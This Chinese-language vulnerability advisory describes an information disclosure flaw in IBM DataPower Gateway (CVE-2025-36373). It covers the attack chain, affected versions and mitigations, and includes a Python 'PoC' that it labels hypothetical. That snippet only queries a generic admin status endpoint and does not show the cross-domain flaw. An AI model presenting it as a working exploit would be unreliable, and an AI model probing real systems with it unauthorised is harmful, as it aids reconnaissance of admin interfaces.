CVE-2025-36373 IBM DataPower信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-36373

漏洞类型

信息泄露

CVSS评分

4.1 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

IBM DataPower Gateway

漏洞概述

IBM DataPower Gateway多个版本中存在一处信息泄露漏洞。该漏洞源于系统在处理跨域数据访问时未实施严格的隔离机制，导致拥有高权限的管理员用户能够访问并获取来自其他域的敏感系统信息。此漏洞CVSS v3.1评分为4.1，被定性为中危风险。攻击者利用该漏洞无需用户交互，但必须具备高等级管理员权限。尽管该漏洞不会影响系统的完整性和可用性，但可能导致机密性降低。受影响的组件涵盖了10.5.0.0至10.6.5.0之间的多个特定版本。

技术细节

该漏洞的核心技术问题在于IBM DataPower Gateway在多域架构下的权限边界控制失效。DataPower Gateway通常利用域来隔离不同的服务环境或业务数据，以防止数据泄露和越权访问。在受影响的版本中，软件在验证API请求或管理界面操作时，存在逻辑缺陷，未能正确校验当前管理员上下文是否有权访问目标域的资源。由于CVSS向量显示攻击复杂度低（AC:L）且无需用户交互（UI:N），只要攻击者获取了高权限凭证（PR:H），即可通过网络发起攻击。攻击者可以通过构造特定的管理API请求，直接查询其他域的配置文件、密钥或运行时状态。这种跨域的信息泄露可能被攻击者用于进一步的内网侦察或横向移动，为后续的攻击提供情报支持。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过钓鱼、社会工程学或其他漏洞获取IBM DataPower Gateway的高权限管理员凭证。

STEP 2

步骤2：构造请求

攻击者使用获取的凭证，通过网络向管理接口发送特制的API请求，试图访问非当前域的系统信息。

STEP 3

步骤3：信息获取

由于漏洞存在，系统未能正确校验域权限，返回了其他域的敏感配置或状态信息，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2025-36373
# Target: IBM DataPower Gateway
# Precondition: Attacker has High Privilege (Admin) credentials

def check_info_disclosure(target_host, username, password):
    """
    Attempts to access cross-domain status information.
    """
    # Example endpoint that might leak info across domains in vulnerable versions
    # This is a hypothetical endpoint based on the vulnerability description.
    url = f"https://{target_host}/mgmt/status/default" 
    
    headers = {
        "Accept": "application/json",
        "X-Transaction-ID": "poc-test"
    }
    
    try:
        response = requests.get(url, headers=headers, auth=(username, password), verify=False, timeout=10)
        
        if response.status_code == 200:
            print("[!] Potential Info Disclosure: Request succeeded.")
            print("[*] Response Data:", response.json())
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[Error] An exception occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    check_info_disclosure("192.168.1.100", "admin", "pass123")

影响范围

IBM DataPower Gateway 10.6CD (10.6.1.0 - 10.6.5.0)

IBM DataPower Gateway 10.5.0 (10.5.0.0 - 10.5.0.20)

IBM DataPower Gateway 10.6.0 (10.6.0.0 - 10.6.0.8)

防御指南

临时缓解措施

在未安装补丁之前，建议实施严格的网络访问控制，仅允许受信任的管理员IP地址访问DataPower的管理端口。同时，应审查并限制管理员账户的数量，确保遵循最小权限原则，并加强对异常管理操作的监控与审计。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36373
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36373
3 Details https://www.cvedetails.com/cve/CVE-2025-36373/
4 VulDB https://vuldb.com/cve/CVE-2025-36373
5 Link https://www.ibm.com/support/pages/node/7267833